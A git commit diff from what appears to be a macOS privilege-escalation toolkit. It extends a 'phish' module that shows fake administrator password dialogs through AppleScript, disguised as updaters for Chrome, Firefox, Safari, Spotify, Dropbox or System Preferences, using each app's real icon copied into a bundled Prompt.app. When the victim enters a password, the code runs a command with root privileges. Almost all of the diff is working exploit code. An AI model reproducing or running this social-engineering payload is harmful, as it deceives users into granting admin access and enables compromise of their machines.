plenty of phish in the sea

thehappydinoa · thehappydinoa · commit 71883f73fc0f · 2019-03-10T00:49:11.000-05:00
diff --git a/.gitignore b/.gitignore
@@ -1,6 +1,7 @@
+*.spec
 *.pyc
 __pycache__
 build/
 dist/
 .DS_Store
-*.spec
+Prompt.app
diff --git a/Prompt.app.zip b/Prompt.app.zip
diff --git a/exploits/general.py b/exploits/general.py
@@ -27,6 +27,10 @@ def default_browser():
             return handler.get("LSHandlerRoleAll")
     return
 
+def app_installed(app_name):
+    """check if app installed"""
+    return os.path.isdir("/Applications/" + app_name) or os.path.isdir("~/Applications/" + app_name)
+
 
 def osascript(command):
     """runs shell for osascript"""
diff --git a/exploits/phish.py b/exploits/phish.py
@@ -1,5 +1,9 @@
 """phishes for sudo with AppleScript"""
-from .general import DEFAULT_COMMAND, default_browser, osascript, random_string
+import os
+import plistlib
+
+from .general import (DEFAULT_COMMAND, app_installed, default_browser,
+                      osascript, random_string)
 
 try:
     input = raw_input
@@ -10,27 +14,57 @@
 __credits__ = "thehappydinoa"
 
 BROWSERS = {
-    "com.google.chrome": "Google Chrome Updater",
-    "org.mozilla.firefox": "Firefox Updater",
-    "com.apple.safari": "Safari Update"
+    "com.google.chrome": ("Google Chrome.app", "/Contents/Resources/app.icns", "Google Chrome Updater"),
+    "org.mozilla.firefox": ("Firefox.app", "/Contents/Resources/firefox.icns", "Firefox Updater"),
+    "com.apple.safari": ("Safari.app", "/Contents/Resources/compass.icns", "Safari Update")
+}
+
+APPS = {
+    "Spotify.app": ("/Contents/Resources/Icon.icns", "Spotify Updater"),
+    "Dropbox.app": ("/Contents/Resources/icon.icns", "DropboxMacUpdate")
 }
 
 
-def admin_prompt(app=None, prompt="System Update", command="echo hello"):
+def admin_prompt(app=None, icon_path=None, prompt="System Update", command="echo hello"):
     """prompts with administrator privileges"""
     rand = random_string()
+    print("\nPrompting: " + prompt)
     if app:
-        payload = """osascript <<END
-          set command to "{command}; echo {success}"
-          tell app "{app}" to activate
-          return tell app "{app}" to do shell script command with prompt "{prompt}" with administrator privileges
-        END""".format(app=app, prompt=prompt, command=command, success=rand)
+        if icon_path:
+            app_path = "Prompt.app"
+            zip_path = "Prompt.app.zip"
+            if not os.path.exists(app_path) and os.path.exists(zip_path):
+                os.system("unzip " + zip_path)
+            if os.path.exists("/Applications/" + app):
+                full_app_path = "/Applications/" + app
+            else:
+                full_app_path = "~/Applications/" + app
+            plist = app_path + "/Contents/Info.plist"
+            info = plistlib.readPlist(plist)
+            info["CFBundleName"] = prompt
+            info["CFBundleIdentifier"] = "com.apple.ScriptEditor.id." + \
+                prompt.replace(" ", "")
+            plistlib.writePlist(info, plist)
+            print(os.system(
+                "cp \"{icon_path}\" \"{app_path}/Contents/Resources/applet.icns\"; touch {app_path};".format(icon_path=full_app_path + icon_path, app_path=app_path)))
+            payload = """open {app_path} --args "{command}; echo {success}" "{prompt}" """.format(
+                app_path=app_path, prompt=prompt, command=command.replace('"', '\"'), success=rand)
+            # print(payload)  # Debugging
+            os.system(payload)
+            print("Application Launched...")
+            return True
+        else:
+            payload = """osascript <<END
+              set command to "{command}; echo {success}"
+              tell app "{app}" to activate
+              return do shell script command with prompt "{prompt}" with administrator privileges
+            END""".format(app=app, prompt=prompt, command=command, success=rand)
+        # return tell app "{app}" to do shell script command with prompt "{prompt}" with administrator privileges
     else:
         payload = """osascript <<END
           set command to "{command}; echo {success}"
           return do shell script command with prompt "{prompt}" with administrator privileges
         END""".format(prompt=prompt, command=command, success=rand)
-    print("\nPrompting: " + prompt)
     response = osascript(payload)
     return rand in response
 
@@ -44,5 +78,10 @@ def run():
     """runs exploit"""
     browser = default_browser()
     if browser and browser in BROWSERS.keys():
-        return admin_prompt(prompt=BROWSERS.get(browser), command=DEFAULT_COMMAND)
-    return admin_prompt(command=DEFAULT_COMMAND)
+        browser_data = BROWSERS.get(browser)
+        return admin_prompt(app=browser_data[0], icon_path=browser_data[1], prompt=browser_data[2], command=DEFAULT_COMMAND)
+    for app in APPS.keys():
+        if app_installed(app):
+            app_info = APPS.get(app)
+            return admin_prompt(app=app, icon_path=app_info[0], prompt=app_info[1], command=DEFAULT_COMMAND)
+    return admin_prompt(app="System Preferences.app", icon_path="/Contents/Resources/PrefApp.icns", prompt="System Update", command=DEFAULT_COMMAND)
diff --git a/root.py b/root.py
@@ -2,7 +2,8 @@
 import platform
 from distutils.version import LooseVersion
 
-from exploits import ardagent, dyld_print_to_file, libmalloc, nopass, piggyback, phish
+from exploits import (ardagent, dyld_print_to_file, libmalloc, nopass, phish,
+                      piggyback)
 
 REDC = "\033[91m[-] "
 YELLOWC = "\033[93m[!] "
